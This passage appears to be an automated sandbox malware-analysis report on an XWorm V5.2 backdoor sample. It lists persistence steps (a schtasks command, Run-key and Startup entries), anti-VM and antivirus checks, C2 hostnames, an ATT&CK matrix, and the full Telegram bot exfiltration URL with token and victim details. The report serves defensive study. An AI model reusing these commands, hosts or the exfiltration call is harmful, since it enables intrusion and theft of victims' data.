                  Source: X.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: X.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: X.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: X.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: X.exe, Messages.cs.Net Code: Memory
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: Memory

                  Persistence and Installation Behavior

                  Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Local\Temp\Svchost.exeJump to dropped file

                  Boot Survival

                  Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnkJump to behavior
                  Source: C:\Users\user\Desktop\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SvchostJump to behavior
                  Source: C:\Users\user\Desktop\X.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\X.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\X.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exe Memory allocated: 920000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\X.exe Memory allocated: 1A560000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 28E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 1A8E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: B90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 1A7A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 1790000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 1B3A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 970000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 1A4A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 2CB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 1ACB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: DA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 1AAA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 29C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Memory allocated: 1A9C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\X.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\X.exe Window / User API: threadDelayed 1095
                  Source: C:\Users\user\Desktop\X.exe Window / User API: threadDelayed 8748
                  Source: C:\Users\user\Desktop\X.exe TID: 2084 Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Users\user\Desktop\X.exe TID: 1216 Thread sleep count: 1095 > 30
                  Source: C:\Users\user\Desktop\X.exe TID: 1216 Thread sleep count: 8748 > 30
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 6628 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 2716 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 6552 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 2656 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 3300 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 3896 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 4976 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Users\user\Desktop\X.exe File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe File Volume queried: C:\ FullSizeInformation
                  Source: X.exe, 00000000.00000002.4057742759.000000001B137000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWnn
                  Source: Amcache.hve.17.dr Binary or memory string: VMware
                  Source: Amcache.hve.17.dr Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.17.dr Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.17.dr Binary or memory string: VMware, Inc.
                  Source: Amcache.hve.17.dr Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.17.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.17.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.17.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.17.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521274770.00000152D00DA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521120511.00000152D009B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.17.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: X.exe, 00000000.00000002.4057742759.000000001B137000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RA
                  Source: Amcache.hve.17.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.17.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.17.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: X.exe, 00000000.00000002.4057742759.000000001B137000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.17.dr Binary or memory string: vmci.sys
                  Source: Amcache.hve.17.dr Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.17.dr Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.17.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 00000012.00000002.4521816106.00000152D0E13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTVMWare
                  Source: Amcache.hve.17.dr Binary or memory string: VMware20,1
                  Source: Amcache.hve.17.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.17.dr Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.17.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.17.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.17.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.17.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.17.dr Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.17.dr Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.17.dr Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.17.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.17.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\X.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\X.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\X.exe Memory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\X.exe Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7096 -s 2972
                  Source: C:\Users\user\Desktop\X.exe Queries volume information: C:\Users\user\Desktop\X.exe VolumeInformation
                  Source: C:\Users\user\Desktop\X.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Svchost.exe VolumeInformation
                  Source: C:\Users\user\Desktop\X.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.17.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.17.dr Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.17.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.17.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: X.exe, 00000000.00000002.4057742759.000000001B0A0000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4058978996.000000001BD18000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4057742759.000000001B10D000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4054716755.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4054716755.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Amcache.hve.17.dr Binary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\X.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match File source: X.exe, type: SAMPLE
                  Source: Yara match File source: 0.0.X.exe.1f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: X.exe PID: 7096, type: MEMORYSTR
                  Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED

                  Remote Access Functionality

                  Source: Yara match File source: X.exe, type: SAMPLE
                  Source: Yara match File source: 0.0.X.exe.1f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: X.exe PID: 7096, type: MEMORYSTR
                  Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 Scheduled Task/Job | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 21 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 231 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 21 Registry Run Keys / Startup Folder | 141 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 11 Process Injection | NTDS | 141 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | 13 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

                  [Behavior graph. ID: 1387988, Sample: X.exe, Start date: 07/02/2024, Architecture: WINDOWS, Score: 100]

                  Source | Detection | Scanner | Label | Link
                  X.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
                  X.exe | 79% | Virustotal | | Browse
                  X.exe | 100% | Avira | HEUR/AGEN.1305769 |
                  X.exe | 100% | Joe Sandbox ML | |

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\Svchost.exe | 100% | Avira | HEUR/AGEN.1305769 |
                  C:\Users\user\AppData\Local\Temp\Svchost.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\Svchost.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
                  C:\Users\user\AppData\Local\Temp\Svchost.exe | 79% | Virustotal | | Browse

                  No Antivirus matches

                  Source | Detection | Scanner | Label | Link
                  eu-central-7075.packetriot.net | 13% | Virustotal | | Browse
                  trusting-smoke-90361.pktriot.net | 1% | Virustotal | | Browse

                  Source | Detection | Scanner | Label | Link
                  http://schemas.mi | 0% | URL Reputation | safe |
                  http://www.w3.g/2000/09/xmldsig#&quot;&gt;&l | 0% | Avira URL Cloud | safe |
                  http://Passport.NET/STS | 0% | Avira URL Cloud | safe |
                  http://Passport.NET/tb_ | 0% | Avira URL Cloud | safe |
                  http://Passport.NET/tbpose | 0% | Avira URL Cloud | safe |
                  http://Passport.NET/tb | 0% | Avira URL Cloud | safe |
                  http://crl.ver) | 0% | Avira URL Cloud | safe |
                  https://login.ecur | 0% | Avira URL Cloud | safe |
                  http://Passport.NET/tb | 0% | Virustotal | | Browse
                  http://Passport.NET/STS | 0% | Virustotal | | Browse
                  trusting-smoke-90361.pktriot.net | 0% | Avira URL Cloud | safe |
                  http://Passport.NET/tb_ | 0% | Virustotal | | Browse
                  trusting-smoke-90361.pktriot.net | 1% | Virustotal | | Browse
                  http://Passport.NET/tbpose | 0% | Virustotal | | Browse

                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  api.telegram.org | 149.154.167.220 | true | false | | high
                  eu-central-7075.packetriot.net | 167.71.56.116 | true | true | | unknown
                  trusting-smoke-90361.pktriot.net | unknown | unknown | true | | unknown

                  Name | Malicious | Antivirus Detection | Reputation
                  https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE9633C7A2F2B74FB9C2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208ZZ4CZYT%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 | false | | high
                  trusting-smoke-90361.pktriot.net | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown

                  Name | Source | Malicious | Antivirus Detection | Reputation
                  https://api.telegram.org/bot | X.exe, Svchost.exe.0.dr | false | | high
                                                                        high
                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecurisvchost.exe, 00000012.00000003.4031962381.00000152D095D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031443608.00000152D0956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameX.exe, 00000000.00000002.4055350482.0000000002561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 00000012.00000003.4013867750.00000152D0927000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://signup.live.com/signup.aspxsvchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://Passport.NET/tb_svchost.exe, 00000012.00000002.4521120511.00000152D0081000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521959377.00000152D0E71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046279655.00000152D0E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • 0%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd2BQpw43/HKsvchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4014124615.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdema#1svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.w3.g/2000/09/xmldsig#&quot;&gt;&lsvchost.exe, 00000012.00000003.4031910850.00000152D0E6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000012.00000002.4521525759.00000152D0913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031991419.00000152D0E52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4056518662.00000152D0966000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJsvchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://account.live.com/msangcwamsvchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013744014.00000152D0957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://crl.ver)svchost.exe, 00000012.00000002.4521274770.00000152D00DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              low
                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoasvchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://passport.net/tbsvchost.exe, 00000012.00000002.4521911037.00000152D0E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521120511.00000152D0081000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://upx.sf.netAmcache.hve.17.drfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 00000012.00000003.4032063230.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4032063230.00000152D095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd%svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxmlsvchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
